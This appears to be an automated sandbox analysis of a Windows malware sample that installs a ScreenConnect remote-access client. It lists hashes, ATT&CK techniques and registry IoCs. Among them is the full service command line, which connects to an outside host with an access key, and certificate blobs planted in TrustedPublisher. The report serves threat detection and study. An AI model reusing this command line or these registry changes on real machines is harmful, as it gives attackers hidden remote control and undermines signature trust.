defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023

Analysis

max time kernel
139s
max time network
120s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14/10/2024, 14:23 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe
Size

81KB
MD5

ac8ba753feb59c96683b599a6b5e4988
SHA1

645ebe7d11b42abad125975786c32815e6150e13
SHA256

defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023
SHA512

21aa3342a55ce8af1b809c560f41ad4e5922f50cf394a74af7a35c93c81b6109d1a00afd6806b240b4e8c8a83a96d8981a04059382295d2a0f1b7b45b7df3909
SSDEEP

1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYF7mxDE:7enkyfPAwiMq0RqRfbaxZJYYFD

Score

8^/10

discovery persistence

Malware Config

Signatures

Manipulates Digital Signatures 1 TTPs 2 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3b776ead-f4ad-41e1-88d0-71a737ecbd10)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\RW1981ZJ.YTC\\EC4WJDZT.9PD\\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=3b776ead-f4ad-41e1-88d0-71a737ecbd10&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAfYu9oc1am0yvHfxstgb83QAAAAACAAAAAAAQZgAAAAEAACAAAABkDhGPKiayLn2Xs4TBmyVZzl5FnS%2b96lnUsNqBBcFdfQAAAAAOgAAAAAIAACAAAABeVBkFzknAvNwwlkEthZTnQO3We5iTZB3z%2fdxEfTSYCKAEAACMFhBBqlUa%2bAUK1tY9tB%2bXJuhM7oEinEoJahv21njhuOV2RdFrRxpQDtH%2fMIjj9FGBLR1CeWKISor5AGEhqVJTf9WdPwpIp%2fM%2bXYfC9BoLXoczZAtFn22h4DoVf3fOU6m5cQbTvr0Jf93zKash4hdVlls1XSsT6nGfx5Hs7WOwrRDpyH3ElrxPWluE3mG3UXdz3id7busgoNm1JDnArvG5%2fPubTMophJ5PBsVV2XBP5IRuWDRpeVXDRP%2fD3WPfqC%2fHQt74IEgbxFucoYoqXMpWzGrPSczrsGdwaFTCG7SjqIFEVDcZhGgxyKGyPlkzeBI37vyM0jKPoE3WZPoXuwOPZ7E6y0sPVWWs7gIqRvBM6pstqQSdqDFK%2fdfbwpHa8zFvztNWI06AnB2%2f4v%2fa%2fWvgSj%2fmbRwzmqSqHDd5c7OGLMECTzeBdh4mflsLEEe4HJhDzIAzELL8BrXlhb8GkXJ3J1310xU3%2biYEu0ZkVoEU%2fOBnSh3vS8Yhf6%2fUfAAAFiukp%2fpkWSgWnhv1G7uPZCrX%2b%2fPsyylt16937P%2bI46RUmN8KS4KqdKq8fhHeAzHzfC8Lh2WOdLBE8m6LZ0%2fe%2bGxAQat8uNkYQDqgCuP0%2fEnCDy3FUsO%2f2B1%2fNByjf89F6T0gLLFONUJ6vi%2fYJX1PfFDUfq0%2bRxa1kLNpMS%2f9A%2fqXYjWEMj7kG3yvm2vJU4tUdnd6QV%2fyuwXDryVsGGVLiAALPhMT13rarJ1Z8Nr9zqUQiL15t832QcL0i4lm2Pra5zKXW5C2Um4OIqyCgOeqHShRVvoYS%2bEyt5XOKB7xU5%2fR%2b6p6Mw%2f25UJ2QmfNHqe8YuXAAfayL06sUscYcCil39GTD%2fIU0O4SEu%2fz6x8SjQzziwltQbMbNyJFV9nDe8grevzSZDcP7lk8U%2fPNdHYasWRsRPMEEnwnNeLGwKZkZI6mBrOSWc%2bNHLJ%2bVzV%2fve9pMEnTd6xlPpUiRc6iH%2b6pVbZTmFU1ZPIresKqt%2bWBv%2b1ToPh4Aif0g6HsagxWcgBl30TCRnVgVL9WQbckR5e4jFzvH0e3awjn3umbL%2fFc4Bls9sdx10%2fca030NdMVsQsCf0DA1hvsH8cuQfj691vO65er2aaJu9%2fyEnroql4qG2NWq4CZbclWc7FSYDljMxAOEVZrL9dSsmQDUF29S7Oo53aenIfkonhrBIlMqvRCdPiMVH6FN%2f3UHNRORcHZeGKlihlmEYVXT3LFJH9aLvX8vCuCaYwQaTiCUk0L7Ac0j9L2x02QipaimCigGyL%2bmLH2XIbgUXVFW17HbGxeEHt3ixNee9%2fUM00us8DtfghVoypMapWfx92mN6w4R3wpH42vmB84x1JiPXNtRlQ7rD3h8nup7gwNW07HsaKqICHWXSUJvwjFMwv3MTeQnVfrbnudPG7gQBtsXnUP1UYMQZ7jB7LtsJvX4%2fis7vCZKt01qr8l7GDbhVIUA%2bcq0MkpP8i0GwRn0Ikp0kRcnAZAhEvEccyId7Qb6SDBYiKbxv18vra5PGoSm3xCgpousbRqqeXgw%2fAI99uPWL2UxLTZhQXniygltBbfYkme47VGBemV1p18WkAAAABGJsa9m3UPZcgpskiPiU3kBC%2bOFs7gBBapQ3vIiia%2b9xoDNYOsrpaOQ%2b0ZlpZUXR6sBB2f1ig2vnPtCo6rnMjg&r=&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe

Downloads MZ/PE file

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log	ScreenConnect.ClientService.exe

Executes dropped EXE 4 IoCs

pid	Process
4052	ScreenConnect.WindowsClient.exe
1004	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe
2720	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
1004	ScreenConnect.ClientService.exe
1004	ScreenConnect.ClientService.exe
1004	ScreenConnect.ClientService.exe
1004	ScreenConnect.ClientService.exe
1004	ScreenConnect.ClientService.exe
1004	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4212	2152	WerFault.exe	82

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\lock!180000009a87580ed40f000058130000000000000000000 = 30303030306664342c30316462316534346364356334363439	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb = 68747470733a2f2f75707068656c702e746f702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsBackstageShell.exe_8 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\DigestMethod = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 680074007400700073003a002f002f00750070007000680065006c0070002e0074006f0070002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e003f0065003d0053007500700070006f0072007400260079003d0047007500650073007400260068003d00710070006b006c00320033002e007a006100700074006f002e006f0072006700260070003d003800300034003100260073003d00330062003700370036006500610064002d0066003400610064002d0034003100650031002d0038003800640030002d0037003100610037003300370065006300620064003100300026006b003d0042006700490041004100410043006b004100410042005300550030004500780041004100670041004100410045004100410051004300700044004c004a00620042003200550043004a0051005300540037004a00250032006200650041004c00340053005200780042004e00390046006e00470044006d007a0075005300530065002500320066006a0048002500320062006e004b00420065004f0051004600480051002500320062004300720033004c0079007000440031004b0053006200310037006f0052005700500034007a0056004800790037004200540035003800350079007a00490064007400450073004c004f0051004a0047005600550077007a006500490046005700610041004b0077004b006600420073004800470025003200660068003800470059005600740038003500570031006f0049005600750044003000680065004a006d004a00740071004500640063004f006a005800760058005000440034006f004a007500510048006f00710068004200620059004c006f0053006e0073006200660072005400500030005200300034003000250032006200630066006b0043004e0073006c007600750066003000310063006e0073006200630041006500790055004500460052004b0049007a0025003200620038006f00300059004a0077007200690078004500360076006400520062003500630078006e00250032006200610075005600330036006d0039003200250032006200360025003200660068004e0043003500730052007a004d00340035004800720031004600550034003700770041003400720041005200610038004f006e00410043005900610066007000330032006a00450033007400320043006d003700450045006b004d00740025003200620053003600480057004b00670061005a004d007000300056004c006b004200670050007700330057006e005000380035006600680073006c0059004e00390055007a00330045005a007400730042006e002500320066003900370043004600450032006a00530041007600340025003200620072006400670049006d00410033006e0061003800260072003d00260069003d0055006e007400690074006c0065006400250032003000530065007300730069006f006e000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 460061006c00730065000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 680074007400700073003a002f002f00750070007000680065006c0070002e0074006f0070002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e00330032000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files\ScreenConnect.Client.dll_fc1d7bd48553fcab = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62a = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\VisibilityRoots	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_c90c8f89b96e2e2e	ScreenConnect.WindowsClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\ComponentStore_RandomString = "54EZYHTGKCQRKGW6EW50W88H"	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_ae93ec2462efb67b	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\SizeOfStronglyNamedComponent = b021010000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\DigestValue = ab068a2f4ffd0509213455c79d311f169cd7cab8	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_ae = 68747470733a2f2f75707068656c702e746f702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
